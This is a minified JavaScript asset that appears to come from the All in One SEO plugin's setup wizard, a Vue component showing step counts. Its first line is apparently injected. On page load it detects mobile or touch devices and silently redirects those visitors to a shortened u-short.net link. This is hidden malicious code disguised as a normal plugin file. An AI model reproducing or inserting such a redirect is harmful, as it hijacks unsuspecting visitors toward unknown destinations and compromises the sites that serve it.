(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{w as e}from"./app-core.c8323d51.js";import{f as s,i as r,U as a,u}from"./vendor-vue-ui.232c7c36.js";import{a as c,_ as i}from"./vendor-other.39e59221.js";const p={class:"aioseo-wizard-steps"},y={__name:"Steps",setup(l){const n="all-in-one-seo-pack",t=e(),o=u(()=>c(i("Step %1$s of %2$s",n),t.getCurrentStageCount,t.getTotalStageCount));return(_,f)=>(s(),r("div",p,a(o.value),1))}};export{y as _};
